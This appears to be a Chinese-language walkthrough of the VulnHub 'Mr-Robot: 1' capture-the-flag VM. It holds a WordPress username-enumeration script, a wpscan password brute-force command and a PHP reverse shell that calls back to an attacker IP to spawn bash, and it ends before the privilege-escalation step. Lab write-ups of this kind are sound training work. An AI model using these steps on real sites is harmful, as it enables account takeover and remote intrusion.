VulnHub通关日记-Mr-Robot-1-Walkthrough

简介

靶机介绍：根据演练，机器人先生。此VM具有隐藏在不同位置的三个Key。您的目标是找到全部三个。每个Key逐渐难以找到。该级别被认为是初学者-中级。
下载地址：Mr-Robot: 1 ~ VulnHub
PS：这个靶机的WEB界面炫酷的一批！大家可以去看看！

运用的知识点

Python脚本验证Wordpress用户是否存在
wpscan爆破用户密码
Wordpress后台编辑页面处Getshell
Nmap提权

信息搜集

拿到靶机先是对目标 IP 进行了端口扫描探测：

1	nmap -A -T4 192.168.159.131

由上图可见，它开放了 80（http）、443（https）两个端口，其中 22（ssh）是关闭了的！

我们先从他的 80 端口开始下手，打开它的页面是牛逼吊炸天的特效：

我先后输入了他的 Commands 参数发现没有什么作用：

prepare
fsociety
inform
question
wakeup
join

然后尝试了一波看看能不能执行命令但是也失败了（我傻逼了，前端JS的特效我去执行命令233333）：

获取Key-1

这个时候在它的”炫酷”页面上没必要浪费时间，我习惯性的看他 robots.txt 文件发现了两个文件：

这个时候成功获取到第一个 Key，而且还得到了一个类似字典文件：fsocity.dic

接下来我直接去扫他的目录文件看看有没有什么突破点：

1	python3 dirsearch.py -u http://192.168.159.131/ -e .php -x 301,302,403

获取Key2-Wordpress后台Getshell

扫描出来后看到网站目录很像是 Wordpress 搭建的网站，我们先验证一下看看：

1	http://192.168.159.131/wp-admin

很显然他的 CMS 就是 Wordpress ，那么我们就可以使用 KALI 上自带的 wpscan 来对它进行简单的扫描看看存在哪些用户：

1	wpscan --url http://192.168.159.131/ -e u

但是扫描出来后发现没用得到一些用户，这个时候容我点燃一支眼理理思路：刚刚我们得到了一个字典文件，是不是要让我们利用那个字典去进入到网站的后台？

按照这个思路，我是用 Python 写了一个小脚本来验证探测有那些用户：

import requests

open_file = open('fsocity.dic', 'r')
temp = open_file.read().splitlines()
count = 0
for username in temp:
    payload = {'log': '{0}'.format(username), 'pwd': 'dummy'}
    headers = {'Content-Type' : 'application/x-www-form-urlencoded'}
    cookies = dict(wordpress_test_cookie='WP+Cookie+check')
    r = requests.post("http://192.168.159.131/wp-login.php", data=payload, headers=headers, cookies=cookies)
    if "Invalid username" not in r.text:
        print username

运行完脚本后我发现它有一个用户为 Elliot，这正是《黑客军团》的主角名字，既然有了用户名那么我们就可以对它进行爆破密码：

1	wpscan --url 192.168.159.131 -U elliot -P /root/Downloads/fsocity.dic -t 20

爆破成功得到了 elliot 的密码为 ER28-0652！随后我拿着密码登陆到了后台来到编辑页面处：Appearance-Editor，然后我写入了反弹shell的php：

<?php
$sock=fsockopen('192.168.159.128',4444);
$descriptorspec=array(
0=>$sock,
1=>$sock,
2=>$sock
);
$process=proc_open('/bin/bash',$descriptorspec,$pipes);
proc_close($process);
echo phpinfo();
?>